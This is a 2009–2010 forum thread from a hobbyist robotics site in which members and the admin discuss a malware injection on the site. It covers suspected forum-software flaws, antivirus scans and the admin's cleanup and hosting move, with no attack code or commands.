Now, how recently did you upgrade the forums to 1.1.8? What version did you have previously? Have you been hacked since 1.1.8? I know for a fact ver 1.1.6 was vulnerable. Aside from that, I've heard rumors of a private 1.1.8 exploit but nothing turned up on google.

Also be aware that yes, other services running on your server can be attacked to inject code into your forums. Ex: Apache, the CP (as it seemed you thought @ homepage), or maybe they just guessed/brute forced your password.

Just felt like stopping by your site today and noticed the bad news :(. I'll probably check back here often until you find out the cause.

Hope those fools learn to get a life... this is really most likely an automated attack. Who would bother to attack a hobbyist site? :/ Anyway... can't wait to build my first robot. Will definitely tack on the rangefinder upgrade hehe... but for now, money's been short + other priorities.

Even if this site is continually being hacked, disable the forums for a while and if it gets hacked again then it's likely it's not a forum exploit (but still could be); but people like me need some awesome guides and hobby hangouts like this place. Oh sure, look at me who has probably 1 post and I came out here to drop a few words - not everyone uses the forum but I'm sure many more have enjoyed this awesome resource without stopping by these forums ;). Take them down if you must, put up another forum software if you really really must.

*Salutes the Admin hobbyist*.
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 19, 2009, 03:51:43 PM
I have Mcaffe (sry if it is spelled wrong) and I ran a check and it found nothing. if this virus gets into my computer what could it do?
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 19, 2009, 04:01:29 PM
yay for admin :) i have norten360 and spybot search and destroy and neither found anything on my pc ;D
Title: Re: Trojan horse on SoR??
Post by: paulstreats on April 19, 2009, 05:19:55 PM
Quote
I have Mcaffe (sry if it is spelled wrong) and I ran a check and it found nothing. if this virus gets into my computer what could it do?

I log straight on to societyofrobots.com not straight into the forums so that might be why you havent noticed anything. The malware as I said above has the ability to read/write/modify files on the host system so it is likely to be a bot system that wants to use your pc without you knowing.

I havent had anything tonight so hopefully admin found it.

Maybe the website is being targeted because of keywords like bot or robot etc... it would seem ironic that botnets are targeted at other bot nets and a real robotic website is being targeted due to plain nameing conventions :P
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 19, 2009, 05:22:35 PM
I havent had anything tonight so hopefully admin found it.
The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the reoccurance.
and yea that would kinda suck if sor was getting caught in the "crossfire" so to speak :-\
Title: Re: Trojan horse on SoR??
Post by: pomprocker on April 20, 2009, 11:07:31 AM
I think this is cross-site scripting?

http://en.wikipedia.org/wiki/Cross-site_scripting (http://en.wikipedia.org/wiki/Cross-site_scripting)


Here is the vulnerabilities of simple machines forum

http://web.nvd.nist.gov/view/vuln/search?execution=e1s2 (http://web.nvd.nist.gov/view/vuln/search?execution=e1s2)
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 20, 2009, 01:53:34 PM
Chrome was telling me there was a problem on any page under the SoR.com domain be it the forums or the main page. I tried everything. Admin did find it however and did remove it. Hopefully it will stay gone for a long long time.
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 20, 2009, 03:31:36 PM
when I click here I get redirected back to the forum home page, or at least so it seems
maybe this is the result of another hack.
http://www.societyofrobots.com/robotforum/index.php?action=bookmarks (http://www.societyofrobots.com/robotforum/index.php?action=bookmarks)
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 20, 2009, 04:10:45 PM
i doubt that would be the result of another hack, the bookmarks page is probably down, if the case that a forum page goes down normally you are directed to a blank page or the homepage.
Title: Re: Trojan horse on SoR??
Post by: Admin on April 21, 2009, 02:18:49 PM
So it appears I still haven't figured out the security flaw, and it appears several different hackers have all abused it to get to SoR lately. This most recent hacker somehow managed to use four different IP addresses simultaneously during the attack.

I can only do the clean and IP ban technique until I figure out the flaw and patch it :'(

Looking at the logs, SoR is being heavily hit by hundreds of automated attacks daily . . . nothing I can do unfortunately.

As for bookmarks, I apologize but the latest virus clean required me to replace files. Not sure which file I replaced that broke bookmarks and it'll take me a few days to find time to fix it.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 21, 2009, 04:37:54 PM
thank you admin! we all appreciate what you are doing for us and how time consuming it is. if im ever in Thailand i will buy you a cake... but for now, have an e-cookie ;D
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 21, 2009, 05:52:36 PM
e-cookie from me too
(I hope you like virtual chocolate  ;) )
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 21, 2009, 07:38:58 PM
4 IPs at once leads me to beleive that its either a bot net or an organized group of people. Not sure why they want to take down SoR so bad buuuut they should stop because thats dumb.

Also, IP banning may not be affective as hackers can bounce their signal through a different machine or network to mask their own IP as someone elses.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 21, 2009, 07:58:23 PM
smart little [email protected]$#ers! why cant they just build a robot like normal people?
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 22, 2009, 06:12:00 AM
what are they accomlishing anyway?
the fact that we are mad at them?

hey! they're e-bullies!  :'(

and admin, I know u don't want to hear this,
when I click on bookmarkd I still go back to the homepage
but in my web address bar it says I am in bookmarks?
???
Title: Re: Trojan horse on SoR??
Post by: Admin on April 22, 2009, 06:15:36 PM
I got good news and bad news.

Good news is that I figured out how to stop the attacks 100% as a short term solution. Basically I turn off the ability to modify SoR when I'm not editing it.

Bad news is that although it will stop further hacks of this type, I'm still not 100% sure how they got in. I think I know how they did it, but the solution (long term) requires me rewriting the forum GUI all over again.

That means I'll have to turn off like every forum feature and slowly re-add them when I have time.
Title: Re: Trojan horse on SoR??
Post by: TrickyNekro on April 22, 2009, 06:17:01 PM
And how long is this supposed to last???
Title: Re: Trojan horse on SoR??
Post by: Admin on April 22, 2009, 06:20:44 PM
And how long is this supposed to last???
Well, my hope is that I'll do it all in one day. Basically start at 8am and go till 8pm. I'll plan it for when I'm free all day to minimize the pain for everyone else.

The forum will work the whole time, its just that the GUI will probably look broken and primitive until I'm finished.
Title: Re: Trojan horse on SoR??
Post by: TrickyNekro on April 22, 2009, 06:23:24 PM
It's your fault we became addicted.... ::)
Title: Re: Trojan horse on SoR??
Post by: voyager2 on July 21, 2010, 11:59:58 PM
Actually bots are robots!
A "normal" robot is real, a bot is software and code.

I've never had a problem with SoR(and hope i never do)
However, around the time I found SoR, a virus invaded my System Volume Information.
Spybot Search And Destroy and  AVG anti-virus couldn't remove it as it's a system folder.
Since I couldn't remove it in XP either I restarted my system and selected Ubuntu operating system and deleted it manually without problem.
Also found some interesting windows goodies this way to...
Title: Re: Trojan horse on SoR??
Post by: Admin on July 22, 2010, 06:47:04 AM
I guess I should update this thread . . .


I moved SoR to a new host early this year, meaning I did a fresh install of everything. Assuming I also didn't freshly install the same vulnerability, SoR is clean :P
Title: Re: Trojan horse on SoR??
Post by: voyager2 on July 23, 2010, 06:08:32 AM
Another epic win for Admin!!